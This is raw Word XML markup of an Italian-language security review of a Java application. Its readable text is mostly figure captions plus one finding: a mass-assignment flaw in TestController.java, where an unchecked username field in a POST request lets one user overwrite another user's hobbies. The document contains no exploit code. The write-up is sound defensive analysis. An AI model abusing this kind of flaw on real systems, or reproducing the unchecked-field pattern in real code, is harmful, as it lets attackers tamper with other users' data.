                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>7</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: UserControllerTes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55BA" id="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-14.05pt;margin-top:277.7pt;width:509.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0Z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BxOv40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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="65EF5949" w14:textId="0017FCF5" w:rsidR="007019BC" w:rsidRPr="00063904"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4E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>7</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserControllerTest.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251726848" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B0F87B8" wp14:editId="73BB6494">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1261745</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6475095" cy="4731544"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="10983803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095" cy="4731544"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w: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3569372B" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F3CC21" w14:textId="28157781" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019E86BA" w14:textId="77777777" w:rsidR="007019BC" w:rsidRDefault="007019BC" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E987B5" w14:textId="77777777" w:rsidR="007019BC" w:rsidRDefault="007019BC" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C07759" w14:textId="4F694AF5" w:rsidR="00DA7D75" w:rsidRDefault="007019BC" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251763712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="156D6D73" wp14:editId="51A76679">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>742315</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4226560</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4636135" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1777431251" name="Casella di testo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FF21143" w14:textId="17D1A254"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4E2F86">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>8</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: PasswordManag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6D73" id="_x0000_s1035" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:58.45pt;margin-top:332.8pt;width:36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oGgIAAD8EAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L07aL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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1FF21143" w14:textId="17D1A254" w:rsidR="007019BC" w:rsidRPr="00953799" w:rsidRDefault="007019BC" w:rsidP="007019BC">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="004E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>8</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: PasswordManager.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00370730">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251727872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7572B1B0" wp14:editId="24F46156">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>148590</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4636251" cy="4021300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="13549119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251" cy="4021300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4DE412" w14:textId="75FE4068" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C92246" w14:textId="29D62DD4" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D764313" w14:textId="77777777" w:rsidR="007019BC" w:rsidRDefault="007019BC" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50222C25" w14:textId="77777777" w:rsidR="007019BC" w:rsidRDefault="007019BC" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28ACAF72" w14:textId="77777777" w:rsidR="007019BC" w:rsidRDefault="007019BC" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61FFA2E4" w14:textId="77777777" w:rsidR="007019BC" w:rsidRDefault="007019BC" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FDDF422" w14:textId="0EAC702A" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7483FA4B" w14:textId="053F2C7C" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5952DE" w14:textId="0784EFA6" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B13464A" w14:textId="6CC6AF20" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4398FB6D" w14:textId="2C19F09F" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15038A82" w14:textId="4A66816B" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E61860E" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB9CDE2" w14:textId="77777777" w:rsidR="00DA7D75" w:rsidRDefault="00DA7D75" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EBFEA19" w14:textId="77777777" w:rsidR="00370730" w:rsidRDefault="00370730" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F7A2689" w14:textId="77777777" w:rsidR="00370730" w:rsidRDefault="00370730" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F462470" w14:textId="77777777" w:rsidR="00370730" w:rsidRDefault="00370730" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752B7391" w14:textId="77777777" w:rsidR="00370730" w:rsidRDefault="00370730" w:rsidP="000B2D9C">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4020AC84" w14:textId="77777777" w:rsidR="001A57CF" w:rsidRDefault="001A57CF" w:rsidP="007019BC"/>
    <w:p w14:paraId="383AB5DE" w14:textId="6700193E" w:rsidR="005D725F" w:rsidRPr="007019BC" w:rsidRDefault="005D725F" w:rsidP="007019BC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007019BC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mass assignment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5332D4A6" w14:textId="0E61DB86" w:rsidR="007019BC" w:rsidRDefault="007019BC" w:rsidP="007019BC">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00C56823">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F0BA95" w14:textId="26127D6E" w:rsidR="007019BC" w:rsidRDefault="007019BC" w:rsidP="007019BC">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0006778F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EBDB0C" w14:textId="77777777" w:rsidR="007019BC" w:rsidRDefault="007019BC" w:rsidP="007019BC">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F9BC21" w14:textId="27A1E06B" w:rsidR="00B508DA" w:rsidRDefault="00B508DA" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>È una vulnerabilità che nasce dalla man</w:t>
      </w:r>
      <w:r w:rsidR="00A31A32">
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>anza di controllo dei campi modificabili di un oggetto</w:t>
      </w:r>
      <w:r w:rsidR="00FD3A3A">
        <w:t>, permettendo agli utenti di modificare o accedere dati che normalmente non dovrebbero essere modificabili e/o accessibili</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B97D8E" w14:textId="77777777" w:rsidR="00350230" w:rsidRDefault="00350230" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54C9EDA9" w14:textId="0F8981D9" w:rsidR="005D725F" w:rsidRDefault="00B508DA" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>In questo</w:t>
      </w:r>
      <w:r w:rsidR="00FD3A3A">
        <w:t xml:space="preserve"> caso</w:t>
      </w:r>
      <w:r w:rsidR="007424E1">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FD3A3A">
        <w:t xml:space="preserve"> l’oggetto Test contiene il campo username superfluo, il quale può essere modificato, facendo in modo di apportare modifiche </w:t>
      </w:r>
      <w:r w:rsidR="00816871">
        <w:t xml:space="preserve">agli hobby di altri utenti </w:t>
      </w:r>
      <w:r>
        <w:t>se l’utente corrente è a conoscenza degli altri username salvati</w:t>
      </w:r>
      <w:r w:rsidR="007424E1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>In questo caso quindi l’exploit è più difficile da fare ma comunque fattibile.</w:t>
      </w:r>
      <w:r w:rsidR="00816871">
        <w:t xml:space="preserve"> La vittima quindi si troverebbe degli hobby non inseriti da lui e, di conseguenza, le offerte a lui proposte non sarebbero congrue agli interessi da lui espressi. In figura 10 è mostrata la funzione saveTestResults() in TestServiceImpl.java richiamata nell’API /test in TestController.java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28485B05" w14:textId="77777777" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6A24A6" w14:textId="620F603C" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>La vulnerabilità risulta vera poiché non c’è nessun controllo sull’utente che sta inserendo gli hobby, ossia l’username inserito nella POST inviata può essere diverso dall’utente autenticato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A1B2A4" w14:textId="18FD6613" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B517CE9" w14:textId="4C41B354" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7065FC49" wp14:editId="71501994">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-358140</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>187960</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6973570" cy="1195705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:wrapNone/>
            <wp:docPr id="1780188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655" b="12970"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="697357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CC5CCA9" wp14:editId="2DC3ECA7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-430530</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1387475</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6973570" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1533630046" name="Casella di testo 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6973570" cy="635"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="479923F7" w14:textId="7CB3254F" w:rsidR="00816871" w:rsidRPr="004511B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4E2F86">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>9</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CCA9" id="_x0000_s1036" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-33.9pt;margin-top:109.25pt;width:549.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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="479923F7" w14:textId="7CB3254F" w:rsidR="00816871" w:rsidRPr="004511B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4E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>9</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: TestController.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="765C4592" w14:textId="4B34D937" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D823B26" w14:textId="4590DFAD" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16EEC224" w14:textId="7869FAE4" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2944F199" w14:textId="5D1CF822" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6133563C" w14:textId="06F52DC4" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13FE468B" w14:textId="218F1FD8" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="165B6787" w14:textId="2FB55CAA" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="707E4DED" w14:textId="77777777" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4826F32A" w14:textId="50977C3F" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251767808" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E866244" wp14:editId="72837065">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-29845</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1912620</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5928995" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="542169707" name="Casella di testo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39E779E" w14:textId="06B92A8E" w:rsidR="00816871" w:rsidRPr="00C03E9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4E2F86">
                              <w:rPr>
                                <w:noProof/>
                              </w:rPr>
                              <w:t>10</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: UserServiceImpl.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6244" id="_x0000_s1037" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-2.35pt;margin-top:150.6pt;width:466.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OGg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fsbnp7dzfjTFLs5vM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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="539E779E" w14:textId="06B92A8E" w:rsidR="00816871" w:rsidRPr="00C03E96" w:rsidRDefault="00816871" w:rsidP="00816871">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="004E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>10</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserServiceImpl.java</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1255CDC5" wp14:editId="50006228">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-29845</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>224790</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5929008" cy="1630680"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="313190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9" b="4823"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5929008"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D0F2" w14:textId="77777777" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ACC3BAF" w14:textId="77777777" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B719509" w14:textId="77777777" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B25FCEC" w14:textId="77777777" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="368CAF19" w14:textId="77777777" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="271CC92E" w14:textId="77777777" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="480B9D3D" w14:textId="77777777" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AABD4DA" w14:textId="77777777" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AF2D439" w14:textId="77777777" w:rsidR="00816871" w:rsidRDefault="00816871" w:rsidP="005D725F">
      <w:pPr>
